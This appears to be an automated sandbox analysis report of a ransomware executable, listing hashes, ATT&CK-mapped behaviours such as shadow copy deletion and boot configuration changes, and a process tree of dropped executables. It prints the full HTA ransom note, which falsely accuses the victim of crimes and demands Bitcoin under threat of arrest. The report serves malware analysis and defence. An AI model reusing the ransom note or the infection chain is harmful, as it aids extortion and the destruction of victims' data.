441116d55e97124a067207bf57483dd3462bccfb034e56c4152675b0dcb118e7

Analysis

max time kernel
126s
max time network
152s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
16-03-2024 15:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe
Size

363KB
MD5

36a0cefeb8b0a606358142d4140ea7cf
SHA1

03ce13b4f60d2fc632b67b41b82b5e8cfaf9939f
SHA256

467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be
SHA512

63304f3ddca578beac157197581e6a2a762d9cf1fb08fa6ae85dcdc26340ae64badb0f4a9cb47521315c366b70bd0cf89bf1b72be29f89e2d91504cec7ca9093
SSDEEP

6144:VEwaWsAzrp8viKgjdCU641BHoKIPi2CRp2pFSnfJxLw/mq3pT+Qrm9m7s:G9UjdtzIKl2YY3SRxLw/BT+X

Score

10^/10

evasion ransomware upx

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\N00fBwZXjOQTTX9M.hta

Ransom Note

<html> <head> <hta:application BORDER = "none" CAPTION = "No" CONTEXTMENU = "NO" INNERBORDER = "No" MAXIMIZEBUTTON = "No" MINIMIZEBUTTON = "No" NAVIGABLE = "No" SCROLL = "No" SCROLLFLAT = "No" SELECTION = "Yes" SHOWINTASKBAR = "No" SINGLEINSTANCE = "Yes" SYSMENU = "No"/> <style> body{ background-color:#000000; margin:0; } .vau{ margin:10px; height:520px; width:750px } .sc{ margin:1px 50px; font-size:40px; width:750px; height:30px; padding: 10px 20px 10px 20px; background-color:#000000; color:#e92124; font-family: Impact; text-transform: uppercase; text-align: center; } .sc1{ margin:1px 50px; font-size:20px; width: 750px; padding:20px; background-color:#000000; color: #e0dede; font-family: Georgia; text-align: left; } .gr{ margin: 10px 0px; color:#189f29; } .red{ margin: 10px 0px; color:#e92124; } .wh{ margin-top:0px; margin-bottom:10px; } .wt{ margin-top:10px; margin-bottom:0px; } </style> <meta http-equiv="Content-Type" content="text/html;charset=utf-8"/> <title>Notification</title> <script language="vbscript"> sub Window_Onload window.resizeTo 850,725 screenWidth = Document.ParentWindow.Screen.AvailWidth screenHeight = Document.ParentWindow.Screen.AvailHeight posLeft = (screenWidth - 850) / 2 posTop = (screenHeight - 725) / 2 window.moveTo posLeft, posTop end sub </script> </head> <body scroll="no"> <div class="vau"> <div class="sc"> All your files have been encrypted! </div> <div class="sc1"> <p class="wh">All of important data on this computer was encrypted with strong RSA-2048 algorithm due to the violation of the federal laws of the United States of America! (Article 1, Section 8, Clause 8; Article 202; Arcticle 210 of the Criminal Code of U.S.A. provides for a deprivation of liberty for four to twelve years.)</p> <b>Following violations were detected:</b><br /> Your IP adress was used to visit websites containing pornography, child pornography, zoophilia and child abuse!<br /> <p class="gr"><b>To unlock your files you have to pay the penalty!</b></p> <p class="red">You have only <b>96 hours</b> to recover your personal data! After this time your unique key will be deleted and file decryption will become impossible!</p> <p class="red">Each <b>12 hours</b> the payment size will be automatically increased by <b>100$</b>!</p> <p class="gr"><b>You must pay the penalty through the Bitcoin Wallet.</b></p> <p class="wt">To get your unique key and unlock files, you should send the following code:</p> <b class="gr">TAVOb1nrt0pLc0ui-67B38C0E52010C27</b><br /> to our agent e-mails:<br /> <b class="gr">[email protected]</b> or<br /> <b class="gr">[email protected]</b><br /> You will recieve all necessary instructions! </div> <div class="sc"> Hurry up or you will be arrested!!! </div> </div> </body> </html>

Emails

class="gr">[email protected]</b>

class="gr">[email protected]</b><br

URLs

http-equiv="Content-Type"

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1808	2792	cmd.exe	194

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
2532	bcdedit.exe
1800	bcdedit.exe

Deletes itself 1 IoCs

pid	Process
2968	cmd.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2km925ZW.lnk	2km925ZW.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\N00fBwZXjOQTTX9M.hta	2km925ZW.exe

Executes dropped EXE 26 IoCs

pid	Process
2412	bZwDPohE.exe
2484	2km925ZW.exe
2788	bZwDPohE.exe
2512	2km925ZW.exe
772	xr9qnma2.exe
2772	1GNLT2Tg.exe
840	1YbAnN3f.exe
1164	RZQHvJ7k.exe
2240	MvC1pbCt.exe
396	yoxm3vFb.exe
1972	o0fogtco.exe
2728	f62i2ygu.exe
2256	xr9qnma2.exe
2584	1GNLT2Tg.exe
2636	1YbAnN3f.exe
1144	MvC1pbCt.exe
1928	RZQHvJ7k.exe
2988	yoxm3vFb.exe
2516	o0fogtco.exe
2036	f62i2ygu.exe
2028	iRHgv8BP.exe
2908	iRHgv8BP.exe
2064	KDCmSj3O.exe
1544	tOBxViTf.exe
2580	tOBxViTf.exe
1276	KDCmSj3O.exe

Loads dropped DLL 40 IoCs

pid	Process
2516	cmd.exe
2516	cmd.exe
2688	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe
2688	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe
2412	bZwDPohE.exe
2152	cmd.exe
2152	cmd.exe
592	cmd.exe
592	cmd.exe
940	cmd.exe
940	cmd.exe
2268	cmd.exe
2268	cmd.exe
2512	2km925ZW.exe
2512	2km925ZW.exe
2712	cmd.exe
2712	cmd.exe
1856	cmd.exe
1856	cmd.exe
2312	cmd.exe
2312	cmd.exe
772	xr9qnma2.exe
1372	cmd.exe
1372	cmd.exe
2772	1GNLT2Tg.exe
840	1YbAnN3f.exe
2240	MvC1pbCt.exe
1164	RZQHvJ7k.exe
396	yoxm3vFb.exe
1972	o0fogtco.exe
2728	f62i2ygu.exe
2580	cmd.exe
2580	cmd.exe
2028	iRHgv8BP.exe
2536	cmd.exe
2536	cmd.exe
1628	cmd.exe
1628	cmd.exe
1544	tOBxViTf.exe
2064	KDCmSj3O.exe

UPX packed file 29 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral14/memory/2688-5-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/2688-4-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/2688-8-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/2688-9-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/2688-10-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/2688-11-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/2688-12-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/2688-27-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/2788-50-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/2788-59-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/2788-61-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/2512-220-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/1144-452-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/2636-462-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/2988-467-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/2512-471-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/1928-473-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/2516-474-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/2036-475-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/2516-493-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/1928-488-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/2908-527-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/2256-532-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/2584-533-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/2036-550-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/2512-742-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/2580-774-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/1276-777-0x0000000000400000-0x0000000000510000-memory.dmp	upx
behavioral14/memory/1276-785-0x0000000000400000-0x0000000000510000-memory.dmp	upx

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\H:	tOBxViTf.exe
File opened (read-only)	\??\J:	xr9qnma2.exe
File opened (read-only)	\??\P:	MvC1pbCt.exe
File opened (read-only)	\??\U:	iRHgv8BP.exe
File opened (read-only)	\??\O:	bZwDPohE.exe
File opened (read-only)	\??\N:	bZwDPohE.exe
File opened (read-only)	\??\G:	2km925ZW.exe
File opened (read-only)	\??\L:	xr9qnma2.exe
File opened (read-only)	\??\X:	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe
File opened (read-only)	\??\Z:	MvC1pbCt.exe
File opened (read-only)	\??\W:	bZwDPohE.exe
File opened (read-only)	\??\Q:	2km925ZW.exe
File opened (read-only)	\??\L:	2km925ZW.exe
File opened (read-only)	\??\U:	tOBxViTf.exe
File opened (read-only)	\??\Y:	1YbAnN3f.exe
File opened (read-only)	\??\Y:	yoxm3vFb.exe
File opened (read-only)	\??\R:	RZQHvJ7k.exe
File opened (read-only)	\??\K:	iRHgv8BP.exe
File opened (read-only)	\??\K:	tOBxViTf.exe
File opened (read-only)	\??\K:	bZwDPohE.exe
File opened (read-only)	\??\G:	1GNLT2Tg.exe
File opened (read-only)	\??\S:	o0fogtco.exe
File opened (read-only)	\??\N:	o0fogtco.exe
File opened (read-only)	\??\U:	f62i2ygu.exe
File opened (read-only)	\??\K:	f62i2ygu.exe
File opened (read-only)	\??\J:	tOBxViTf.exe
File opened (read-only)	\??\Z:	1GNLT2Tg.exe
File opened (read-only)	\??\U:	1GNLT2Tg.exe
File opened (read-only)	\??\Q:	xr9qnma2.exe
File opened (read-only)	\??\H:	MvC1pbCt.exe
File opened (read-only)	\??\I:	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe
File opened (read-only)	\??\S:	1YbAnN3f.exe
File opened (read-only)	\??\U:	MvC1pbCt.exe
File opened (read-only)	\??\V:	f62i2ygu.exe
File opened (read-only)	\??\Z:	bZwDPohE.exe
File opened (read-only)	\??\L:	o0fogtco.exe
File opened (read-only)	\??\X:	iRHgv8BP.exe
File opened (read-only)	\??\L:	tOBxViTf.exe
File opened (read-only)	\??\Q:	KDCmSj3O.exe
File opened (read-only)	\??\Y:	MvC1pbCt.exe
File opened (read-only)	\??\T:	MvC1pbCt.exe
File opened (read-only)	\??\O:	f62i2ygu.exe
File opened (read-only)	\??\N:	RZQHvJ7k.exe
File opened (read-only)	\??\X:	1GNLT2Tg.exe
File opened (read-only)	\??\W:	MvC1pbCt.exe
File opened (read-only)	\??\R:	MvC1pbCt.exe
File opened (read-only)	\??\V:	MvC1pbCt.exe
File opened (read-only)	\??\R:	o0fogtco.exe
File opened (read-only)	\??\R:	xr9qnma2.exe
File opened (read-only)	\??\U:	o0fogtco.exe
File opened (read-only)	\??\I:	o0fogtco.exe
File opened (read-only)	\??\R:	tOBxViTf.exe
File opened (read-only)	\??\O:	1GNLT2Tg.exe
File opened (read-only)	\??\I:	MvC1pbCt.exe
File opened (read-only)	\??\Z:	f62i2ygu.exe
File opened (read-only)	\??\H:	o0fogtco.exe
File opened (read-only)	\??\W:	1YbAnN3f.exe
File opened (read-only)	\??\N:	1YbAnN3f.exe
File opened (read-only)	\??\H:	1YbAnN3f.exe
File opened (read-only)	\??\E:	o0fogtco.exe
File opened (read-only)	\??\P:	2km925ZW.exe
File opened (read-only)	\??\J:	2km925ZW.exe
File opened (read-only)	\??\M:	1GNLT2Tg.exe
File opened (read-only)	\??\H:	xr9qnma2.exe

Suspicious use of SetThreadContext 14 IoCs

description	pid	Process	procid_target
PID 2100 set thread context of 2688	2100	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	30
PID 2412 set thread context of 2788	2412	bZwDPohE.exe	40
PID 2484 set thread context of 2512	2484	2km925ZW.exe	41
PID 772 set thread context of 2256	772	xr9qnma2.exe	88
PID 2772 set thread context of 2584	2772	1GNLT2Tg.exe	99
PID 840 set thread context of 2636	840	1YbAnN3f.exe	102
PID 2240 set thread context of 1144	2240	MvC1pbCt.exe	107
PID 1164 set thread context of 1928	1164	RZQHvJ7k.exe	114
PID 396 set thread context of 2988	396	yoxm3vFb.exe	115
PID 1972 set thread context of 2516	1972	o0fogtco.exe	119
PID 2728 set thread context of 2036	2728	f62i2ygu.exe	120
PID 2028 set thread context of 2908	2028	iRHgv8BP.exe	173
PID 1544 set thread context of 2580	1544	tOBxViTf.exe	396
PID 2064 set thread context of 1276	2064	KDCmSj3O.exe	397

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File opened for modification	C:\PROGRA~3\MICROS~1\Windows\STARTM~1\Programs\Startup\N00fBwZXjOQTTX9M.hta	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Interacts with shadow copies 2 TTPs 2 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
2408	vssadmin.exe
2808	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Runs ping.exe 1 TTPs 14 IoCs

Remote System Discovery

T1018

pid	Process
1320	PING.EXE
948	PING.EXE
2428	PING.EXE
1160	PING.EXE
1484	PING.EXE
2028	PING.EXE
1708	PING.EXE
2980	PING.EXE
2432	PING.EXE
2904	PING.EXE
784	PING.EXE
2700	PING.EXE
1248	PING.EXE
556	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2688	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe
2512	2km925ZW.exe
2512	2km925ZW.exe
2512	2km925ZW.exe
2512	2km925ZW.exe
2512	2km925ZW.exe
2512	2km925ZW.exe
2512	2km925ZW.exe
2512	2km925ZW.exe
2512	2km925ZW.exe
2512	2km925ZW.exe
2512	2km925ZW.exe
2584	1GNLT2Tg.exe
2584	1GNLT2Tg.exe
2584	1GNLT2Tg.exe
2584	1GNLT2Tg.exe
2584	1GNLT2Tg.exe
2584	1GNLT2Tg.exe
2256	xr9qnma2.exe
2256	xr9qnma2.exe
2584	1GNLT2Tg.exe
2584	1GNLT2Tg.exe
2256	xr9qnma2.exe
2256	xr9qnma2.exe
2584	1GNLT2Tg.exe
2584	1GNLT2Tg.exe
2584	1GNLT2Tg.exe
2584	1GNLT2Tg.exe
2256	xr9qnma2.exe
2256	xr9qnma2.exe
2584	1GNLT2Tg.exe
2584	1GNLT2Tg.exe
2256	xr9qnma2.exe
2256	xr9qnma2.exe
2584	1GNLT2Tg.exe
2584	1GNLT2Tg.exe
2256	xr9qnma2.exe
2256	xr9qnma2.exe
2584	1GNLT2Tg.exe
2584	1GNLT2Tg.exe
2584	1GNLT2Tg.exe
2584	1GNLT2Tg.exe
2256	xr9qnma2.exe
2256	xr9qnma2.exe
2584	1GNLT2Tg.exe
2584	1GNLT2Tg.exe
2256	xr9qnma2.exe
2256	xr9qnma2.exe
2584	1GNLT2Tg.exe
2584	1GNLT2Tg.exe
2256	xr9qnma2.exe
2256	xr9qnma2.exe
2584	1GNLT2Tg.exe
2584	1GNLT2Tg.exe
2256	xr9qnma2.exe
2256	xr9qnma2.exe
2584	1GNLT2Tg.exe
2584	1GNLT2Tg.exe
2584	1GNLT2Tg.exe
2584	1GNLT2Tg.exe
2256	xr9qnma2.exe
2256	xr9qnma2.exe
2584	1GNLT2Tg.exe
2584	1GNLT2Tg.exe

Suspicious use of AdjustPrivilegeToken 43 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2308	WMIC.exe
Token: SeSecurityPrivilege	2308	WMIC.exe
Token: SeTakeOwnershipPrivilege	2308	WMIC.exe
Token: SeLoadDriverPrivilege	2308	WMIC.exe
Token: SeSystemProfilePrivilege	2308	WMIC.exe
Token: SeSystemtimePrivilege	2308	WMIC.exe
Token: SeProfSingleProcessPrivilege	2308	WMIC.exe
Token: SeIncBasePriorityPrivilege	2308	WMIC.exe
Token: SeCreatePagefilePrivilege	2308	WMIC.exe
Token: SeBackupPrivilege	2308	WMIC.exe
Token: SeRestorePrivilege	2308	WMIC.exe
Token: SeShutdownPrivilege	2308	WMIC.exe
Token: SeDebugPrivilege	2308	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2308	WMIC.exe
Token: SeRemoteShutdownPrivilege	2308	WMIC.exe
Token: SeUndockPrivilege	2308	WMIC.exe
Token: SeManageVolumePrivilege	2308	WMIC.exe
Token: 33	2308	WMIC.exe
Token: 34	2308	WMIC.exe
Token: 35	2308	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2308	WMIC.exe
Token: SeSecurityPrivilege	2308	WMIC.exe
Token: SeTakeOwnershipPrivilege	2308	WMIC.exe
Token: SeLoadDriverPrivilege	2308	WMIC.exe
Token: SeSystemProfilePrivilege	2308	WMIC.exe
Token: SeSystemtimePrivilege	2308	WMIC.exe
Token: SeProfSingleProcessPrivilege	2308	WMIC.exe
Token: SeIncBasePriorityPrivilege	2308	WMIC.exe
Token: SeCreatePagefilePrivilege	2308	WMIC.exe
Token: SeBackupPrivilege	2308	WMIC.exe
Token: SeRestorePrivilege	2308	WMIC.exe
Token: SeShutdownPrivilege	2308	WMIC.exe
Token: SeDebugPrivilege	2308	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2308	WMIC.exe
Token: SeRemoteShutdownPrivilege	2308	WMIC.exe
Token: SeUndockPrivilege	2308	WMIC.exe
Token: SeManageVolumePrivilege	2308	WMIC.exe
Token: 33	2308	WMIC.exe
Token: 34	2308	WMIC.exe
Token: 35	2308	WMIC.exe
Token: SeBackupPrivilege	2504	vssvc.exe
Token: SeRestorePrivilege	2504	vssvc.exe
Token: SeAuditPrivilege	2504	vssvc.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2100 wrote to memory of 2688	2100	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	30
PID 2100 wrote to memory of 2688	2100	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	30
PID 2100 wrote to memory of 2688	2100	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	30
PID 2100 wrote to memory of 2688	2100	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	30
PID 2100 wrote to memory of 2688	2100	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	30
PID 2100 wrote to memory of 2688	2100	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	30
PID 2100 wrote to memory of 2688	2100	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	30
PID 2100 wrote to memory of 2688	2100	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	30
PID 2688 wrote to memory of 2832	2688	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	31
PID 2688 wrote to memory of 2832	2688	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	31
PID 2688 wrote to memory of 2832	2688	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	31
PID 2688 wrote to memory of 2832	2688	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	31
PID 2688 wrote to memory of 2516	2688	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	33
PID 2688 wrote to memory of 2516	2688	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	33
PID 2688 wrote to memory of 2516	2688	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	33
PID 2688 wrote to memory of 2516	2688	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	33
PID 2516 wrote to memory of 2412	2516	cmd.exe	35
PID 2516 wrote to memory of 2412	2516	cmd.exe	35
PID 2516 wrote to memory of 2412	2516	cmd.exe	35
PID 2516 wrote to memory of 2412	2516	cmd.exe	35
PID 2688 wrote to memory of 2484	2688	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	36
PID 2688 wrote to memory of 2484	2688	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	36
PID 2688 wrote to memory of 2484	2688	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	36
PID 2688 wrote to memory of 2484	2688	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	36
PID 2688 wrote to memory of 2968	2688	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	37
PID 2688 wrote to memory of 2968	2688	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	37
PID 2688 wrote to memory of 2968	2688	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	37
PID 2688 wrote to memory of 2968	2688	467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe	37
PID 2968 wrote to memory of 2980	2968	cmd.exe	39
PID 2968 wrote to memory of 2980	2968	cmd.exe	39
PID 2968 wrote to memory of 2980	2968	cmd.exe	39
PID 2968 wrote to memory of 2980	2968	cmd.exe	39
PID 2412 wrote to memory of 2788	2412	bZwDPohE.exe	40
PID 2412 wrote to memory of 2788	2412	bZwDPohE.exe	40
PID 2412 wrote to memory of 2788	2412	bZwDPohE.exe	40
PID 2412 wrote to memory of 2788	2412	bZwDPohE.exe	40
PID 2412 wrote to memory of 2788	2412	bZwDPohE.exe	40
PID 2412 wrote to memory of 2788	2412	bZwDPohE.exe	40
PID 2412 wrote to memory of 2788	2412	bZwDPohE.exe	40
PID 2412 wrote to memory of 2788	2412	bZwDPohE.exe	40
PID 2484 wrote to memory of 2512	2484	2km925ZW.exe	41
PID 2484 wrote to memory of 2512	2484	2km925ZW.exe	41
PID 2484 wrote to memory of 2512	2484	2km925ZW.exe	41
PID 2484 wrote to memory of 2512	2484	2km925ZW.exe	41
PID 2484 wrote to memory of 2512	2484	2km925ZW.exe	41
PID 2484 wrote to memory of 2512	2484	2km925ZW.exe	41
PID 2484 wrote to memory of 2512	2484	2km925ZW.exe	41
PID 2484 wrote to memory of 2512	2484	2km925ZW.exe	41
PID 2788 wrote to memory of 2400	2788	bZwDPohE.exe	42
PID 2788 wrote to memory of 2400	2788	bZwDPohE.exe	42
PID 2788 wrote to memory of 2400	2788	bZwDPohE.exe	42
PID 2788 wrote to memory of 2400	2788	bZwDPohE.exe	42
PID 2512 wrote to memory of 2152	2512	2km925ZW.exe	44
PID 2512 wrote to memory of 2152	2512	2km925ZW.exe	44
PID 2512 wrote to memory of 2152	2512	2km925ZW.exe	44
PID 2512 wrote to memory of 2152	2512	2km925ZW.exe	44
PID 2400 wrote to memory of 948	2400	cmd.exe	46
PID 2400 wrote to memory of 948	2400	cmd.exe	46
PID 2400 wrote to memory of 948	2400	cmd.exe	46
PID 2400 wrote to memory of 948	2400	cmd.exe	46
PID 2152 wrote to memory of 772	2152	cmd.exe	47
PID 2152 wrote to memory of 772	2152	cmd.exe	47
PID 2152 wrote to memory of 772	2152	cmd.exe	47
PID 2152 wrote to memory of 772	2152	cmd.exe	47

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 46 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2216	attrib.exe
396	attrib.exe
2776	attrib.exe
2864	attrib.exe
2684	attrib.exe
2776	attrib.exe
740	attrib.exe
920	attrib.exe
2500	attrib.exe
2136	attrib.exe
1028	attrib.exe
1464	attrib.exe
2268	attrib.exe
2596	attrib.exe
2896	attrib.exe
948	attrib.exe
2136	attrib.exe
2648	attrib.exe
696	attrib.exe
1956	attrib.exe
1768	attrib.exe
1372	attrib.exe
1648	attrib.exe
832	attrib.exe
2908	attrib.exe
740	attrib.exe
1496	attrib.exe
1100	attrib.exe
1720	attrib.exe
1932	attrib.exe
848	attrib.exe
2496	attrib.exe
1804	attrib.exe
2572	attrib.exe
2384	attrib.exe
2576	attrib.exe
2424	attrib.exe
784	attrib.exe
2340	attrib.exe
2992	attrib.exe
1952	attrib.exe
2424	attrib.exe
2684	attrib.exe
2016	attrib.exe
3036	attrib.exe
2088	attrib.exe

C:\Users\Admin\AppData\Local\Temp\467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe
"C:\Users\Admin\AppData\Local\Temp\467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2100
- C:\Users\Admin\AppData\Local\Temp\467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe
  "C:\Users\Admin\AppData\Local\Temp\467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be.exe"
  2⤵
  - Loads dropped DLL
  - Enumerates connected drives
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2688
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Local\Temp\467C2B~1.EXE" > "C:\Users\Admin\AppData\Roaming\YLTCBC~1\2km925ZW.exe"
    3⤵
    PID:2832
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\YLTCBC~1\2km925ZW.exe" > "C:\Users\Admin\AppData\Local\Temp\bZwDPohE.exe" && "C:\Users\Admin\AppData\Local\Temp\bZwDPohE.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "START" "60000"
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2516
  - - C:\Users\Admin\AppData\Local\Temp\bZwDPohE.exe
      "C:\Users\Admin\AppData\Local\Temp\bZwDPohE.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "START" "60000"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:2412
    - - C:\Users\Admin\AppData\Local\Temp\bZwDPohE.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bZwDPohE.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "START" "60000"
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Suspicious use of WriteProcessMemory
        
        PID:2788
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\1TO4UAic.cmd"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2400
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        7⤵
        Runs ping.exe
        
        PID:948
- - C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\2km925ZW.exe
    "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\2km925ZW.exe" N00fBwZXjOQTTX9M
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:2484
  - - C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\2km925ZW.exe
      "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\2km925ZW.exe" N00fBwZXjOQTTX9M
      4⤵
      Drops startup file
      Executes dropped EXE
      Loads dropped DLL
      Enumerates connected drives
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:2512
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\YLTCBC~1\2km925ZW.exe" > "C:\Users\Admin\AppData\Roaming\MICROS~1\xr9qnma2.exe" && "C:\Users\Admin\AppData\Roaming\MICROS~1\xr9qnma2.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\2km925ZW.exe" "C:\Users\Admin\AppData\Local\Microsoft\1GNLT2Tg.exe" 1
        5⤵
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
